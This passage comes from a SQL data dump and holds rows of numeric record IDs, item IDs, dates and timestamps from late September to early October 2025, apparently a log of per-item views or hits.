20:08:20'),(91642,5374,1,'2025-09-29','2025-09-29 20:08:20'),(91643,5383,1,'2025-09-29','2025-09-29 20:08:22'),(91644,5570,1,'2025-09-29','2025-09-29 20:08:23'),(91645,5378,1,'2025-09-29','2025-09-29 20:08:23'),(91646,72,1,'2025-09-29','2025-09-29 20:08:26'),(91647,5415,1,'2025-09-29','2025-09-29 20:08:28'),(91648,72,1,'2025-09-29','2025-09-29 20:08:29'),(91649,5578,1,'2025-09-29','2025-09-29 20:08:29'),(91650,72,1,'2025-09-29','2025-09-29 20:08:31'),(91651,5526,1,'2025-09-29','2025-09-29 20:09:07'),(91652,5557,1,'2025-09-29','2025-09-29 20:09:11'),(91653,5553,1,'2025-09-29','2025-09-29 20:09:13'),(91654,5545,1,'2025-09-29','2025-09-29 20:09:15'),(91655,5530,1,'2025-09-29','2025-09-29 20:09:16'),(91656,5539,1,'2025-09-29','2025-09-29 20:09:16'),(91657,5588,1,'2025-09-29','2025-09-29 20:09:17'),(91658,5573,1,'2025-09-29','2025-09-29 20:09:22'),(91659,5536,1,'2025-09-29','2025-09-29 20:09:23'),(91660,2419,1,'2025-09-29','2025-09-29 20:09:36'),(91661,2410,1,'2025-09-29','2025-09-29 20:09:50'),(91662,2411,1,'2025-09-29','2025-09-29 20:09:51'),(91663,472,1,'2025-09-29','2025-09-29 20:09:53'),(91664,3664,1,'2025-09-29','2025-09-29 20:09:57'),(91665,2395,1,'2025-09-29','2025-09-29 20:10:00'),(91666,469,1,'2025-09-29','2025-09-29 20:10:09'),(91667,5582,1,'2025-09-29','2025-09-29 20:10:09'),(91668,467,1,'2025-09-29','2025-09-29 20:10:10'),(91669,5585,1,'2025-09-29','2025-09-29 20:10:18'),(91670,5371,1,'2025-09-29','2025-09-29 20:10:51'),(91671,5484,1,'2025-09-29','2025-09-29 20:10:52'),(91672,5346,1,'2025-09-29','2025-09-29 20:10:54'),(91673,5476,1,'2025-09-29','2025-09-29 20:10:55'),(91674,5507,1,'2025-09-29','2025-09-29 20:10:57'),(91675,5421,1,'2025-09-29','2025-09-29 20:10:58'),(91676,5499,1,'2025-09-29','2025-09-29 20:10:59'),(91677,5495,1,'2025-09-29','2025-09-29 20:10:59'),(91678,5518,1,'2025-09-29','2025-09-29 20:11:15'),(91679,5522,1,'2025-09-29','2025-09-29 20:11:36'),(91680,4738,1,'2025-09-29','2025-09-29 20:11:39'),(91681,4785,1,'2025-09-29','2025-09-29 20:11:41'),(91682,4779,1,'2025-09-29','2025-09-29 20:11:44'),(91683,4827,1,'2025-09-29','2025-09-29 20:11:45'),(91684,4830,1,'2025-09-29','2025-09-29 20:11:47'),(91685,4832,1,'2025-09-29','2025-09-29 20:11:50'),(91686,4837,1,'2025-09-29','2025-09-29 20:11:54'),(91687,4835,1,'2025-09-29','2025-09-29 20:11:56'),(91688,4840,1,'2025-09-29','2025-09-29 20:12:15'),(91689,5001,1,'2025-09-29','2025-09-29 20:12:17'),(91690,4842,1,'2025-09-29','2025-09-29 20:12:21'),(91691,4971,1,'2025-09-29','2025-09-29 20:12:21'),(91692,5005,1,'2025-09-29','2025-09-29 20:12:22'),(91693,4845,1,'2025-09-29','2025-09-29 20:12:23'),(91694,1544,1,'2025-09-29','2025-09-29 22:18:38'),(91695,3038,1,'2025-09-29','2025-09-29 22:30:16'),(91696,5512,1,'2025-09-29','2025-09-29 23:28:06'),(91697,5436,1,'2025-09-30','2025-09-30 00:17:15'),(91698,1606,1,'2025-09-30','2025-09-30 00:23:40'),(91699,72,1,'2025-09-30','2025-09-30 00:24:27'),(91700,5420,1,'2025-09-30','2025-09-30 00:33:50'),(91701,87,1,'2025-09-30','2025-09-30 00:38:43'),(91702,1544,1,'2025-09-30','2025-09-30 00:52:08'),(91703,5512,1,'2025-09-30','2025-09-30 01:15:24'),(91704,80,1,'2025-09-30','2025-09-30 01:39:00'),(91705,4966,1,'2025-09-30','2025-09-30 02:13:00'),(91706,4950,1,'2025-09-30','2025-09-30 02:41:29'),(91707,4950,1,'2025-09-30','2025-09-30 02:41:37'),(91708,5259,1,'2025-09-30','2025-09-30 03:29:11'),(91709,4960,1,'2025-09-30','2025-09-30 04:05:08'),(91710,5593,1,'2025-09-30','2025-09-30 04:30:53'),(91711,4950,1,'2025-09-30','2025-09-30 04:44:19'),(91712,76,1,'2025-09-30','2025-09-30 04:48:16'),(91713,5593,1,'2025-09-30','2025-09-30 05:54:23'),(91714,5593,1,'2025-09-30','2025-09-30 05:54:25'),(91715,2801,1,'2025-09-30','2025-09-30 06:54:50'),(91716,3083,1,'2025-09-30','2025-09-30 08:13:16'),(91717,4950,1,'2025-09-30','2025-09-30 11:18:43'),(91718,4950,1,'2025-09-30','2025-09-30 11:32:03'),(91719,4930,1,'2025-09-30','2025-09-30 11:33:03'),(91720,4941,1,'2025-09-30','2025-09-30 11:33:24'),(91721,80,1,'2025-09-30','2025-09-30 12:51:40'),(91722,80,1,'2025-09-30','2025-09-30 12:51:47'),(91723,5454,1,'2025-09-30','2025-09-30 13:40:36'),(91724,5454,1,'2025-09-30','2025-09-30 13:40:39'),(91725,4950,1,'2025-09-30','2025-09-30 14:33:37'),(91726,4950,1,'2025-09-30','2025-09-30 15:24:41'),(91727,4960,1,'2025-09-30','2025-09-30 15:32:38'),(91728,2751,1,'2025-09-30','2025-09-30 16:52:04'),(91729,2410,1,'2025-09-30','2025-09-30 16:59:12'),(91730,4950,1,'2025-09-30','2025-09-30 17:01:35'),(91731,91,1,'2025-09-30','2025-09-30 17:48:05'),(91732,5502,1,'2025-09-30','2025-09-30 17:49:23'),(91733,474,1,'2025-09-30','2025-09-30 18:03:25'),(91734,474,1,'2025-09-30','2025-09-30 18:03:27'),(91735,3069,1,'2025-09-30','2025-09-30 18:12:42'),(91736,5298,1,'2025-09-30','2025-09-30 18:13:28'),(91737,5397,1,'2025-09-30','2025-09-30 18:17:21'),(91738,2804,1,'2025-09-30','2025-09-30 18:52:03'),(91739,5512,1,'2025-09-30','2025-09-30 19:15:20'),(91740,5412,1,'2025-09-30','2025-09-30 21:21:24'),(91741,3079,1,'2025-09-30','2025-09-30 21:48:29'),(91742,3117,1,'2025-09-30','2025-09-30 21:58:19'),(91743,2904,1,'2025-09-30','2025-09-30 22:03:23'),(91744,3038,1,'2025-09-30','2025-09-30 22:16:39'),(91745,2956,1,'2025-09-30','2025-09-30 22:39:49'),(91746,91,1,'2025-09-30','2025-09-30 22:47:09'),(91747,5512,1,'2025-09-30','2025-09-30 23:36:08'),(91748,108,1,'2025-10-01','2025-10-01 00:36:15'),(91749,5512,1,'2025-10-01','2025-10-01 01:13:10'),(91750,3486,1,'2025-10-01','2025-10-01 01:18:09'),(91751,1711,1,'2025-10-01','2025-10-01 01:24:33'),(91752,5492,1,'2025-10-01','2025-10-01 01:47:44'),(91753,5292,1,'2025-10-01','2025-10-01 02:32:50'),(91754,3261,1,'2025-10-01','2025-10-01 03:46:19'),(91755,4404,1,'2025-10-01','2025-10-01 06:11:12'),(91756,3102,1,'2025-10-01','2025-10-01 06:12:17'),(91757,1718,1,'2025-10-01','2025-10-01 08:06:27'),(91758,4573,1,'2025-10-01','2025-10-01 08:23:33'),(91759,4950,1,'2025-10-01','2025-10-01 08:35:35'),(91760,80,1,'2025-10-01','2025-10-01 08:38:35'),(91761,4950,1,'2025-10-01','2025-10-01 08:38:56'),(91762,2419,1,'2025-10-01','2025-10-01 10:49:26'),(91763,2411,1,'2025-10-01','2025-10-01 10:53:44'),(91764,2411,1,'2025-10-01','2025-10-01 10:55:54'),(91765,5409,1,'2025-10-01','2025-10-01 11:31:32'),(91766,4950,1,'2025-10-01','2025-10-01 11:49:05'),(91767,80,1,'2025-10-01','2025-10-01 11:49:13'),(91768,4950,1,'2025-10-01','2025-10-01 12:15:24'),(91769,4408,1,'2025-10-01','2025-10-01 12:29:10'),(91770,4722,1,'2025-10-01','2025-10-01 13:09:37'),(91771,2956,1,'2025-10-01','2025-10-01 13:23:21'),(91772,1711,1,'2025-10-01','2025-10-01 13:41:07'),(91773,5420,1,'2025-10-01','2025-10-01 14:18:45'),(91774,5570,1,'2025-10-01','2025-10-01 14:46:13'),(91775,91,1,'2025-10-01','2025-10-01 15:13:28'),(91776,3096,1,'2025-10-01','2025-10-01 15:26:13'),(91777,1586,1,'2025-10-01','2025-10-01 16:00:27'),(91778,5461,1,'2025-10-01','2025-10-01 16:43:48'),(91779,5515,1,'2025-10-01','2025-10-01 17:15:44'),(91780,5433,1,'2025-10-01','2025-10-01 17:20:16'),(91781,3117,1,'2025-10-01','2025-10-01 17:51:14'),(91782,5441,1,'2025-10-01','2025-10-01 17:51:17'),(91783,4944,1,'2025-10-01','2025-10-01 17:52:16'),(91784,5449,1,'2025-10-01','2025-10-01 18:02:50'),(91785,4738,1,'2025-10-01','2025-10-01 19:01:08'),(91786,91,1,'2025-10-01','2025-10-01 19:19:37'),(91787,4938,1,'2025-10-01','2025-10-01 20:54:32'),(91788,3097,1,'2025-10-01','2025-10-01 21:18:38'),(91789,1703,1,'2025-10-01','2025-10-01 22:02:39'),(91790,84,1,'2025-10-01','2025-10-01 22:09:30'),(91791,4950,1,'2025-10-01','2025-10-01 23:59:20'),(91792,4950,1,'2025-10-02','2025-10-02 00:36:53'),(91793,1711,1,'2025-10-02','2025-10-02 00:47:31'),(91794,5163,1,'2025-10-02','2025-10-02 01:22:06'),(91795,5295,1,'2025-10-02','2025-10-02 03:00:33'),(91796,1713,1,'2025-10-02','2025-10-02 03:06:27'),(91797,5507,1,'2025-10-02','2025-10-02 03:09:15'),(91798,1751,1,'2025-10-02','2025-10-02 03:22:32'),(91799,3664,1,'2025-10-02','2025-10-02 05:06:17'),(91800,5109,1,'2025-10-02','2025-10-02 05:49:27'),(91801,570,1,'2025-10-02','2025-10-02 06:26:30'),(91802,4776,1,'2025-10-02','2025-10-02 07:48:12'),(91803,5573,1,'2025-10-02','2025-10-02 08:04:03'),(91804,5441,1,'2025-10-02','2025-10-02 09:00:18'),(91805,4950,1,'2025-10-02','2025-10-02 09:14:24'),(91806,335,1,'2025-10-02','2025-10-02 09:28:28'),(91807,4424,1,'2025-10-02','2025-10-02 09:28:33'),(91808,4444,1,'2025-10-02','2025-10-02 10:13:45'),(91809,1724,1,'2025-10-02','2025-10-02 10:16:27'),(91810,4950,1,'2025-10-02','2025-10-02 10:18:06'),(91811,4448,1,'2025-10-02','2025-10-02 10:58:30'),(91812,4546,1,'2025-10-02','2025-10-02 11:34:26'),(91813,4612,1,'2025-10-02','2025-10-02 11:53:45'),(91814,1745,1,'2025-10-02','2025-10-02 12:01:08'),(91815,89,1,'2025-10-02','2025-10-02 12:10:45'),(91816,5421,1,'2025-10-02','2025-10-02 12:13:29'),(91817,5005,1,'2025-10-02','2025-10-02 12:35:23'),(91818,68,1,'2025-10-02','2025-10-02 12:38:38'),(91819,1770,1,'2025-10-02','2025-10-02 12:39:20'),(91820,4377,1,'2025-10-02','2025-10-02 12:46:26'),(91821,4546,1,'2025-10-02','2025-10-02 12:46:39'),(91822,3664,1,'2025-10-02','2025-10-02 12:48:39'),(91823,335,1,'2025-10-02','2025-10-02 12:53:53'),(91824,91,1,'2025-10-02','2025-10-02 13:20:07'),(91825,91,1,'2025-10-02','2025-10-02 13:31:39'),(91826,4377,1,'2025-10-02','2025-10-02 13:45:59'),(91827,4448,1,'2025-10-02','2025-10-02 13:57:00'),(91828,5248,1,'2025-10-02','2025-10-02 13:58:34'),(91829,4950,1,'2025-10-02','2025-10-02 14:01:23'),(91830,3083,1,'2025-10-02','2025-10-02 14:08:17'),(91831,5515,1,'2025-10-02','2025-10-02 14:13:32'),(91832,4363,1,'2025-10-02','2025-10-02 14:41:42'),(91833,5593,1,'2025-10-02','2025-10-02 14:47:21'),(91834,1594,1,'2025-10-02','2025-10-02 15:01:44'),(91835,91,1,'2025-10-02','2025-10-02 15:07:43'),(91836,5050,1,'2025-10-02','2025-10-02 15:16:50'),(91837,5050,1,'2025-10-02','2025-10-02 15:16:50'),(91838,5050,1,'2025-10-02','2025-10-02 15:16:50'),(91839,5464,1,'2025-10-02','2025-10-02 15:28:58'),(91840,4792,1,'2025-10-02','2025-10-02 15:30:16'),(91841,4275,1,'2025-10-02','2025-10-02 15:40:39'),(91842,1592,1,'2025-10-02','2025-10-02 15:43:34'),(91843,4988,1,'2025-10-02','2025-10-02 15:51:01'),(91844,2161,1,'2025-10-02','2025-10-02 15:51:33'),(91845,5146,1,'2025-10-02','2025-10-02 16:01:26'),(91846,5502,1,'2025-10-02','2025-10-02 17:10:00'),(91847,5330,1,'2025-10-02','2025-10-02 17:32:30'),(91848,4529,1,'2025-10-02','2025-10-02 17:41:09'),(91849,5425,1,'2025-10-02','2025-10-02 17:42:24'),(91850,2904,1,'2025-10-02','2025-10-02 17:53:13'),(91851,5567,1,'2025-10-02','2025-10-02 17:58:26'),(91852,89,1,'2025-10-02','2025-10-02 18:18:29'),(91853,3087,1,'2025-10-02','2025-10-02 18:33:28'),(91854,5163,1,'2025-10-02','2025-10-02 18:54:29'),(91855,5320,1,'2025-10-02','2025-10-02 19:13:20'),(91856,1590,1,'2025-10-02','2025-10-02 19:18:39'),(91857,4866,1,'2025-10-02','2025-10-02 19:23:01'),(91858,4966,1,'2025-10-02','2025-10-02 19:33:42'),(91859,3005,1,'2025-10-02','2025-10-02 19:46:27'),(91860,4301,1,'2025-10-02','2025-10-02 19:54:29'),(91861,1612,1,'2025-10-02','2025-10-02 20:02:03'),(91862,1582,1,'2025-10-02','2025-10-02 20:10:51'),(91863,1749,1,'2025-10-02','2025-10-02 20:18:16'),(91864,91,1,'2025-10-02','2025-10-02 20:20:51'),(91865,5264,1,'2025-10-02','2025-10-02 20:31:26'),(91866,4618,1,'2025-10-02','2025-10-02 20:55:52'),(91867,1602,1,'2025-10-02','2025-10-02 20:55:57'),(91868,467,1,'2025-10-02','2025-10-02 21:09:21'),(91869,1610,1,'2025-10-02','2025-10-02 21:16:26'),(91870,1604,1,'2025-10-02','2025-10-02 21:23:22'),(91871,5292,1,'2025-10-02','2025-10-02 21:40:22'),(91872,4608,1,'2025-10-02','2025-10-02 21:45:44'),(91873,2965,1,'2025-10-02','2025-10-02 21:46:30'),(91874,2704,1,'2025-10-02','2025-10-02 21:55:09'),(91875,3041,1,'2025-10-02','2025-10-02 21:57:36'),(91876,1588,1,'2025-10-02','2025-10-02 22:16:27'),(91877,5397,1,'2025-10-02','2025-10-02 22:33:14'),(91878,3261,1,'2025-10-02','2025-10-02 23:34:43'),(91879,1584,1,'2025-10-03','2025-10-03 01:23:38'),(91880,2804,1,'2025-10-03','2025-10-03 02:57:29'),(91881,4424,1,'2025-10-03','2025-10-03 04:54:14'),(91882,1743,1,'2025-10-03','2025-10-03 05:10:44'),(91883,3691,1,'2025-10-03','2025-10-03 05:29:06'),(91884,5264,1,'2025-10-03','2025-10-03 06:43:36'),(91885,468,1,'2025-10-03','2025-10-03 07:10:21'),(91886,2804,1,'2025-10-03','2025-10-03 07:13:00'),(91887,2804,1,'2025-10-03','2025-10-03 07:28:55'),(91888,5037,1,'2025-10-03','2025-10-03 07:35:12'),(91889,5028,1,'2025-10-03','2025-10-03 08:47:04'),(91890,4930,1,'2025-10-03','2025-10-03 08:52:36'),(91891,4950,1,'2025-10-03','2025-10-03 08:59:52'),(91892,4335,1,'2025-10-03','2025-10-03 09:34:59'),(91893,1582,1,'2025-10-03','2025-10-03 09:51:52'),(91894,3104,1,'2025-10-03','2025-10-03 11:04:43'),(91895,1608,1,'2025-10-03','2025-10-03 11:11:08'),(91896,91,1,'2025-10-03','2025-10-03 11:22:02'),(91897,5406,1,'2025-10-03','2025-10-03 11:29:26'),(91898,76,1,'2025-10-03','2025-10-03 11:33:00'),(91899,1608,1,'2025-10-03','2025-10-03 11:33:44'),(91900,467,1,'2025-10-03','2025-10-03 11:40:20'),(91901,91,1,'2025-10-03','2025-10-03 11:43:40'),(91902,5406,1,'2025-10-03','2025-10-03 12:07:41'),(91903,5420,1,'2025-10-03','2025-10-03 12:34:35'),(91904,2704,1,'2025-10-03','2025-10-03 14:00:02'),(91905,5292,1,'2025-10-03','2025-10-03 14:04:43'),(91906,5420,1,'2025-10-03','2025-10-03 14:31:01'),(91907,5406,1,'2025-10-03','2025-10-03 15:16:55'),(91908,5464,1,'2025-10-03','2025-10-03 16:26:41'),(91909,5464,1,'2025-10-03','2025-10-03 17:04:53'),(91910,3069,1,'2025-10-03','2025-10-03 17:14:10'),(91911,4529,1,'2025-10-03','2025-10-03 17:29:59'),(91912,5578,1,'2025-10-03','2025-10-03 17:33:02'),(91913,2904,1,'2025-10-03','2025-10-03 17:38:14'),(91914,5428,1,'2025-10-03','2025-10-03 17:42:48'),(91915,3038,1,'2025-10-03','2025-10-03 17:43:03'),(91916,3045,1,'2025-10-03','2025-10-03 17:46:00'),(91917,4420,1,'2025-10-03','2025-10-03 17:51:34'),(91918,3774,1,'2025-10-03','2025-10-03 18:29:37'),(91919,4950,1,'2025-10-03','2025-10-03 19:03:52'),(91920,80,1,'2025-10-03','2025-10-03 19:03:58'),(91921,5280,1,'2025-10-03','2025-10-03 19:55:39'),(91922,91,1,'2025-10-03','2025-10-03 20:24:37'),(91923,3781,1,'2025-10-03','2025-10-03 21:23:03'),(91924,5570,1,'2025-10-03','2025-10-03 21:50:29'),(91925,1703,1,'2025-10-03','2025-10-03 22:17:11'),(91926,467,1,'2025-10-03','2025-10-03 22:21:26'),(91927,1608,1,'2025-10-03','2025-10-03 22:31:32'),(91928,1703,1,'2025-10-03','2025-10-03 22:49:09'),(91929,76,1,'2025-10-03','2025-10-03 22:50:59'),(91930,89,1,'2025-10-03','2025-10-03 23:23:12'),(91931,5062,1,'2025-10-04','2025-10-04 01:08:58'),(91932,5536,1,'2025-10-04','2025-10-04 02:17:34'),(91933,5343,1,'2025-10-04','2025-10-04 02:38:41'),(91934,5359,1,'2025-10-04','2025-10-04 03:13:05'),(91935,5359,1,'2025-10-04','2025-10-04 03:28:54'),(91936,474,1,'2025-10-04','2025-10-04 04:12:01'),(91937,2558,1,'2025-10-04','2025-10-04 04:24:56'),(91938,5585,1,'2025-10-04','2025-10-04 05:24:47'),(91939,72,1,'2025-10-04','2025-10-04 06:40:00'),(91940,471,1,'2025-10-04','2025-10-04 07:38:24'),(91941,2419,1,'2025-10-04','2025-10-04 07:58:59'),(91942,4542,1,'2025-10-04','2025-10-04 08:18:39'),(91943,3781,1,'2025-10-04','2025-10-04 08:46:50'),(91944,5020,1,'2025-10-04','2025-10-04 09:09:43'),(91945,5020,1,'2025-10-04','2025-10-04 09:09:43'),(91946,5020,1,'2025-10-04','2025-10-04 09:09:44'),(91947,5461,1,'2025-10-04','2025-10-04 10:05:48'),(91948,5585,1,'2025-10-04','2025-10-04 10:16:47'),(91949,80,1,'2025-10-04','2025-10-04 11:22:29'),(91950,5464,1,'2025-10-04','2025-10-04 13:14:43'),(91951,5128,1,'2025-10-04','2025-10-04 13:19:47'),(91952,4520,1,'2025-10-04','2025-10-04 13:51:47'),(91953,4966,1,'2025-10-04','2025-10-04 14:49:29'),(91954,4651,1,'2025-10-04','2025-10-04 14:54:21'),(91955,87,1,'2025-10-04','2025-10-04 15:44:29'),(91956,1604,1,'2025-10-04','2025-10-04 16:07:25'),(91957,1699,1,'2025-10-04','2025-10-04 16:48:01'),(91958,1766,1,'2025-10-04','2025-10-04 16:58:53'),(91959,5502,1,'2025-10-04','2025-10-04 17:11:51'),(91960,4660,1,'2025-10-04','2025-10-04 17:24:53'),(91961,2809,1,'2025-10-04','2025-10-04 17:30:15'),(91962,5400,1,'2025-10-04','2025-10-04 17:31:37'),(91963,1877,1,'2025-10-04','2025-10-04 17:53:50'),(91964,5605,1,'2025-10-04','2025-10-04 17:54:32'),(91965,5461,1,'2025-10-04','2025-10-04 18:04:21'),(91966,5492,1,'2025-10-04','2025-10-04 18:06:21'),(91967,110,1,'2025-10-04','2025-10-04 18:08:38'),(91968,4420,1,'2025-10-04','2025-10-04 18:30:47'),(91969,1604,1,'2025-10-04','2025-10-04 19:12:00'),(91970,1711,1,'2025-10-04','2025-10-04 20:17:18'),(91971,91,1,'2025-10-04','2025-10-04 20:38:01'),(91972,470,1,'2025-10-04','2025-10-04 21:14:12'),(91973,1766,1,'2025-10-04','2025-10-04 21:49:49'),(91974,1734,1,'2025-10-04','2025-10-04 21:54:22'),(91975,1582,1,'2025-10-04','2025-10-04 22:37:28'),(91976,4412,1,'2025-10-05','2025-10-05 00:45:40'),(91977,5464,1,'2025-10-05','2025-10-05 00:53:25'),(91978,4960,1,'2025-10-05','2025-10-05 01:17:18'),(91979,89,1,'2025-10-05','2025-10-05 08:23:31'),(91980,4382,1,'2025-10-05','2025-10-05 09:13:58'),(91981,1582,1,'2025-10-05','2025-10-05 09:14:57'),(91982,1588,1,'2025-10-05','2025-10-05 12:13:59'),(91983,3102,1,'2025-10-05','2025-10-05 13:13:25'),(91984,4950,1,'2025-10-05','2025-10-05 13:36:11'),(91985,87,1,'2025-10-05','2025-10-05 13:38:06'),(91986,76,1,'2025-10-05','2025-10-05 13:38:27'),(91987,72,1,'2025-10-05','2025-10-05 13:38:52'),(91988,5539,1,'2025-10-05','2025-10-05 13:39:59'),(91989,2993,1,'2025-10-05','2025-10-05 13:44:09'),(91990,72,1,'2025-10-05','2025-10-05 13:44:49'),(91991,1728,1,'2025-10-05','2025-10-05 13:56:53'),(91992,3710,1,'2025-10-05','2025-10-05 14:27:07'),(91993,2178,1,'2025-10-05','2025-10-05 14:35:46'),(91994,3691,1,'2025-10-05','2025-10-05 14:48:09'),(91995,4420,1,'2025-10-05','2025-10-05 14:53:59'),(91996,4494,1,'2025-10-05','2025-10-05 15:07:48'),(91997,1608,1,'2025-10-05','2025-10-05 15:35:06'),(91998,1722,1,'2025-10-05','2025-10-05 15:49:59'),(91999,2956,1,'2025-10-05','2025-10-05 16:05:03'),(92000,5502,1,'2025-10-05','2025-10-05 16:14:02'),(92001,1732,1,'2025-10-05','2025-10-05 16:18:01'),(92002,470,1,'2025-10-05','2025-10-05 16:22:00'),(92003,4971,1,'2025-10-05','2025-10-05 16:26:56'),(92004,5259,1,'2025-10-05','2025-10-05 16:47:02'),(92005,469,1,'2025-10-05','2025-10-05 17:07:07'),(92006,5502,1,'2025-10-05','2025-10-05 17:13:17'),(92007,3307,1,'2025-10-05','2025-10-05 17:13:24'),(92008,5397,1,'2025-10-05','2025-10-05 17:15:11'),(92009,5433,1,'2025-10-05','2025-10-05 17:18:25'),(92010,5436,1,'2025-10-05','2025-10-05 17:57:16'),(92011,72,1,'2025-10-05','2025-10-05 17:59:17'),(92012,5420,1,'2025-10-05','2025-10-05 17:59:26'),(92013,5464,1,'2025-10-05','2025-10-05 18:10:41'),(92014,3313,1,'2025-10-05','2025-10-05 18:23:24'),(92015,3079,1,'2025-10-05','2025-10-05 18:38:07'),(92016,3092,1,'2025-10-05','2025-10-05 19:13:22'),(92017,91,1,'2025-10-05','2025-10-05 20:49:19'),(92018,467,1,'2025-10-05','2025-10-05 21:36:20'),(92019,467,1,'2025-10-05','2025-10-05 21:36:22'),(92020,1722,1,'2025-10-05','2025-10-05 21:41:09'),(92021,4556,1,'2025-10-05','2025-10-05 21:42:39'),(92022,84,1,'2025-10-05','2025-10-05 22:26:12'),(92023,5317,1,'2025-10-05','2025-10-05 22:29:16'),(92024,5598,1,'2025-10-05','2025-10-05 23:08:11'),(92025,5601,1,'2025-10-06','2025-10-06 00:43:05'),(92026,3249,1,'2025-10-06','2025-10-06 00:48:51'),(92027,68,1,'2025-10-06','2025-10-06 01:24:35'),(92028,1608,1,'2025-10-06','2025-10-06 02:12:39'),(92029,5476,1,'2025-10-06','2025-10-06 02:22:55'),(92030,5264,1,'2025-10-06','2025-10-06 02:39:04'),(92031,5553,1,'2025-10-06','2025-10-06 02:52:07'),(92032,5472,1,'2025-10-06','2025-10-06 03:04:14'),(92033,3705,1,'2025-10-06','2025-10-06 05:20:41'),(92034,3055,1,'2025-10-06','2025-10-06 05:26:17'),(92035,4645,1,'2025-10-06','2025-10-06 05:38:59'),(92036,3005,1,'2025-10-06','2025-10-06 06:55:52'),(92037,5476,1,'2025-10-06','2025-10-06 07:31:20'),(92038,2704,1,'2025-10-06','2025-10-06 08:26:16'),(92039,335,1,'2025-10-06','2025-10-06 08:59:33'),(92040,3251,1,'2025-10-06','2025-10-06 10:00:24'),(92041,4980,1,'2025-10-06','2025-10-06 10:50:15'),(92042,1584,1,'2025-10-06','2025-10-06 11:40:37'),(92043,2804,1,'2025-10-06','2025-10-06 11:47:06'),(92044,5522,1,'2025-10-06','2025-10-06 12:36:02'),(92045,2419,1,'2025-10-06','2025-10-06 13:51:05'),(92046,5467,1,'2025-10-06','2025-10-06 14:04:55'),(92047,3297,1,'2025-10-06','2025-10-06 14:05:26'),(92048,5454,1,'2025-10-06','2025-10-06 14:25:37'),(92049,5512,1,'2025-10-06','2025-10-06 15:07:57'),(92050,4709,1,'2025-10-06','2025-10-06 15:20:48'),(92051,5518,1,'2025-10-06','2025-10-06 15:52:49'),(92052,1730,1,'2025-10-06','2025-10-06 15:53:22'),(92053,5518,1,'2025-10-06','2025-10-06 15:53:24'),(92054,5518,1,'2025-10-06','2025-10-06 15:53:37'),(92055,76,1,'2025-10-06','2025-10-06 15:54:51'),(92056,1768,1,'2025-10-06','2025-10-06 17:09:58'),(92057,2395,1,'2025-10-06','2025-10-06 17:39:32'),(92058,5515,1,'2025-10-06','2025-10-06 17:56:44'),(92059,3781,1,'2025-10-06','2025-10-06 18:10:04'),(92060,5464,1,'2025-10-06','2025-10-06 18:13:38'),(92061,5146,1,'2025-10-06','2025-10-06 18:35:27'),(92062,4944,1,'2025-10-06','2025-10-06 18:37:26'),(92063,5512,1,'2025-10-06','2025-10-06 19:12:10'),(92064,5163,1,'2025-10-06','2025-10-06 19:23:52'),(92065,2297,1,'2025-10-06','2025-10-06 19:51:59'),(92066,4529,1,'2025-10-06','2025-10-06 20:05:54'),(92067,80,1,'2025-10-06','2025-10-06 20:44:09'),(92068,5515,1,'2025-10-06','2025-10-06 20:48:53'),(92069,4722,1,'2025-10-06','2025-10-06 21:09:04'),(92070,91,1,'2025-10-06','2025-10-06 21:14:08'),(92071,5406,1,'2025-10-06','2025-10-06 21:16:28'),(92072,5436,1,'2025-10-06','2025-10-06 22:00:04'),(92073,5409,1,'2025-10-06','2025-10-06 22:03:44'),(92074,5567,1,'2025-10-06','2025-10-06 22:26:09'),(92075,4977,1,'2025-10-06','2025-10-06 23:01:37'),(92076,4950,1,'2025-10-06','2025-10-06 23:10:24'),(92077,110,1,'2025-10-07','2025-10-07 01:13:49'),(92078,4681,1,'2025-10-07','2025-10-07 01:14:02'),(92079,76,1,'2025-10-07','2025-10-07 01:55:20'),(92080,5320,1,'2025-10-07','2025-10-07 06:41:13'),(92081,3102,1,'2025-10-07','2025-10-07 06:57:22'),(92082,2775,1,'2025-10-07','2025-10-07 07:01:06'),(92083,4368,1,'2025-10-07','2025-10-07 07:17:05'),(92084,3251,1,'2025-10-07','2025-10-07 07:30:22'),(92085,4612,1,'2025-10-07','2025-10-07 10:11:51'),(92086,1870,1,'2025-10-07','2025-10-07 11:18:52'),(92087,474,1,'2025-10-07','2025-10-07 11:49:34'),(92088,476,1,'2025-10-07','2025-10-07 11:49:46'),(92089,5549,1,'2025-10-07','2025-10-07 11:59:53'),(92090,1877,1,'2025-10-07','2025-10-07 12:19:42'),(92091,5415,1,'2025-10-07','2025-10-07 12:29:31'),(92092,4648,1,'2025-10-07','2025-10-07 12:51:02'),(92093,5259,1,'2025-10-07','2025-10-07 13:50:49'),(92094,4400,1,'2025-10-07','2025-10-07 14:39:32'),(92095,3069,1,'2025-10-07','2025-10-07 17:16:00'),(92096,5406,1,'2025-10-07','2025-10-07 17:46:24'),(92097,4977,1,'2025-10-07','2025-10-07 17:58:13'),(92098,72,1,'2025-10-07','2025-10-07 18:03:02'),(92099,3486,1,'2025-10-07','2025-10-07 18:10:36'),(92100,5433,1,'2025-10-07','2025-10-07 18:12:44'),(92101,4744,1,'2025-10-07','2025-10-07 20:24:48'),(92102,5518,1,'2025-10-07','2025-10-07 20:28:45'),(92103,1582,1,'2025-10-07','2025-10-07 21:42:11'),(92104,91,1,'2025-10-07','2025-10-07 22:09:43'),(92105,4440,1,'2025-10-08','2025-10-08 00:41:22'),(92106,80,1,'2025-10-08','2025-10-08 03:05:03'),(92107,4835,1,'2025-10-08','2025-10-08 03:56:11'),(92108,3034,1,'2025-10-08','2025-10-08 04:02:18'),(92109,5512,1,'2025-10-08','2025-10-08 04:25:17'),(92110,4404,1,'2025-10-08','2025-10-08 04:28:27'),(92111,87,1,'2025-10-08','2025-10-08 05:08:05'),(92112,5454,1,'2025-10-08','2025-10-08 05:16:43'),(92113,1608,1,'2025-10-08','2025-10-08 06:51:48'),(92114,1608,1,'2025-10-08','2025-10-08 06:54:35'),(92115,76,1,'2025-10-08','2025-10-08 08:53:36'),(92116,467,1,'2025-10-08','2025-10-08 09:00:18'),(92117,2419,1,'2025-10-08','2025-10-08 09:58:51'),(92118,5397,1,'2025-10-08','2025-10-08 11:15:50'),(92119,5515,1,'2025-10-08','2025-10-08 12:09:26'),(92120,4950,1,'2025-10-08','2025-10-08 12:41:38'),(92121,4950,1,'2025-10-08','2025-10-08 14:03:12'),(92122,4950,1,'2025-10-08','2025-10-08 14:06:58'),(92123,5578,1,'2025-10-08','2025-10-08 14:22:08'),(92124,2804,1,'2025-10-08','2025-10-08 14:26:37'),(92125,2804,1,'2025-10-08','2025-10-08 14:27:07'),(92126,5259,1,'2025-10-08','2025-10-08 14:30:19'),(92127,2813,1,'2025-10-08','2025-10-08 